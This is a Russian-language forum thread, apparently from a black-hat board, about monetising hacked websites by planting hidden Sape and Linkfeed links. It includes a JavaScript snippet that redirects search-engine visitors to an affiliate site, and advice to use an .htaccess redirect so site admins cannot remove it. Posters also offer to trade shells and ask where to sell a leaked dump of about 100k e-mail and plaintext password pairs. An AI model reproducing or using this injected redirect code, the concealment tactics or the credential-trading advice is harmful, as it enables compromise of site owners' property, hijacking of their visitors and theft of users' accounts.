А кто-то пробовал вставлять этот скрипт для сапы и линкфид на сайты написанные на ASP ? Если да, то поделитесь пожалуйста кодом
На linkfeed кода для ASP-сайтов нет, на сапе может быть есть, так как биржа более популярная, но я там не зарегистрирован, поэтому не знаю. Но никто не мешает переписать код самому или нанять человека, который перепишет с PHP на на любой другой язык, используемый в ASP-скриптах.
Code: function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!= -1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"</s'+'cript>')}else{document.write('.')}}R(); При переходе с яндекса почему то не редиректит
всместо яваскрипт редиректа лучше юзать редирект через htaccess,тогда если админ имеет доступ только к админке он не сможет убрать редирект я 1 раз так сделал и на том сайте 3 дня редирект повисел,сливал на платник по скидкам,800рублей с 1к уников)
кто-нибудь все-таки смого решить проблему с линкфидом при добовлении нового сайта?? бьюсь головой об стену..
у кого-нибудь есть опыт монетизации шелов на бурж биржах линков типо сапы отблагадарю шелами щедро айсикью 267042
Хм.. вроде все норм, но ссылки почему-то еррор (не в body), хотя код идет так Code: <body> <div style="position:absolute; left: -2000px; width: 2000px;">сцылка</div>...
В сапу не добавляется сайт с установленным из 1-го поста скриптом.Хотя прописанный слой в исходнике страницы выводит. Скрипт необходимые файлы создает. Сапа пишет: Код на сайте не установлен Что не так делаю?
палишся и кто после этого впн из подписи будет использовать да и на бсс у тебя фотка в форме.. ты где год то пропадал?
Если сделать копию сайта, и в роботс.тхт прописать новый домен? Таким макаром как я понимаю можно угнать себе сайт
Поставил код, бот линкфида зарегистрировал в ОК 1500 страниц, но ссылки не выводятся, юзаю скрипт автора. Ссылки приняло некоторые и статус NEW стоит, деньги не идут чтото. заплачу 10 $ тому кто объяснит в чем дело. icq 233444 Объясните в чем дело
Эээ, есть дамп адалта, ~100к мыл с открытым пассом. Тоесть это минимум пол лимона? :/ :\ Куда например продавать дампы забугора?
Не проходит проверку с твоим кодом на LinkFeed. Пишет: "код на главной странице не найден". Хотя он там 100% есть, даже сапа схавала и все работает. Куда копать?
кстати у меня тоже было 2 таких сайта, которые в сапу приняли а в линкфид с ошибкой ... Для меня это так и осталось загадкой)) Кстати не знаю насколько актуально сейчас скрывать ссылки в сапе и линкфиде, потому что они добавили кнопку "пожаловаться" из за этого довольно быстро добавленные сайты должны уходить под статус модерация и с этим статусом у вас на сайте не могут покупать новые ссылки, пока вы не уберете скрытые ссылки ...
А что сапа долго работает с этим кодом , меня почему то решили кинуть с модерацией ,так еще и предупреждение выдали по поводу того что ссылки слишком спрятаны )))))